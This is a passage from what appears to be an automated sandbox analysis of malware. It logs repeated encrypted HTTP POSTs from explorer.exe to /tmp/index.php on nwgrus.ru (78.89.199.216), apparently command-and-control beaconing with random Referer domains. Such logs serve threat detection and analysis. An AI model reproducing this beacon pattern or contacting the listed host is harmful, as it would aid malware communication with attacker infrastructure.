Oct 13, 2024 17:02:45.661891937 CEST	218	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 38 5d b9 fb Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu8]cINe`aOG\y.6CvK&C!mL\Rl7#t@~%Yv.\|J2:0 L
Oct 13, 2024 17:02:46.864932060 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:46.882323980 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cspwoprndoye.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: nwgrus.ru
Oct 13, 2024 17:02:46.882323980 CEST	128	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 5f 03 d0 ff Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu_n}kN:pKN0tKb:
Oct 13, 2024 17:02:48.087645054 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:48.098006964 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qtrqfgpakuyxgovn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: nwgrus.ru
Oct 13, 2024 17:02:48.098058939 CEST	262	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 39 5e bd aa Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu9^c5Va\a2A5rQYZ\|l}7WRDD_3^caf:Nofk/r(A<oYLT'#IeE-\|ecvaG+
Oct 13, 2024 17:02:49.323573112 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:49.380553007 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cmqaenxsxeyowd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 196 Host: nwgrus.ru
Oct 13, 2024 17:02:49.380609989 CEST	196	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 44 3e e0 9b Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuD>_cc7EwN%b,rAuEZ.#TX.)<VLVLG%HxGDJn6lC_
Oct 13, 2024 17:02:50.630939007 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:50.639411926 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rpyskssnoppwv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: nwgrus.ru
Oct 13, 2024 17:02:50.639473915 CEST	290	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7a 2b cd 97 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuz+mla[Z!6/:OtSV-)TJ{ZgKKO5'E'GAt!B2kQIP3EP%GaGz
Oct 13, 2024 17:02:51.846788883 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:51 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:51.857182026 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uspdxnihexd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 202 Host: nwgrus.ru
Oct 13, 2024 17:02:51.857182026 CEST	202	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 62 21 eb ba Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vub!szMg5*,]9Fs>Aq?/$<Rw'WkP3{?c/dhB>hI
Oct 13, 2024 17:02:53.051822901 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:53.060765028 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fljiwnmgncpvmdu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: nwgrus.ru
Oct 13, 2024 17:02:53.060798883 CEST	234	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 66 1c c2 f8 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vufHNmHF\|iv6;`jGU;S"KAO&%QII7r+y]p3(h\|;xI=N=ixb8U+L0
Oct 13, 2024 17:02:54.269166946 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:54 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:54.277864933 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hbbbwgrmtjdu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: nwgrus.ru
Oct 13, 2024 17:02:54.277901888 CEST	234	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 30 25 c2 aa Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu0%}ZGnSu~a+"?z[6Tz~Y*EZ@;b`EK14<6H?mk\|pCP(]I`;ea0
Oct 13, 2024 17:02:55.482976913 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:55.490760088 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yhuliplstnjp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: nwgrus.ru
Oct 13, 2024 17:02:55.490760088 CEST	173	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 21 5a a8 f1 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu!Z8f_~;aQ]C q[`ynP+Yqp_4F2RA</
Oct 13, 2024 17:02:56.675520897 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:56.685101032 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hiodckefgdl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 13, 2024 17:02:56.685101986 CEST	131	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 56 40 df bc Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuV@<Vf%[=^>21@ATE
Oct 13, 2024 17:02:58.136038065 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:57 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49768	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:58.144890070 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cttvtshacog.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 228 Host: nwgrus.ru
Oct 13, 2024 17:02:58.144921064 CEST	228	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 42 1b a3 fe Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuBTc"g2`,#l]nG7M[P-IZK,; uyFXz!s6F#nj1Cnl}P
Oct 13, 2024 17:02:59.375215054 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: 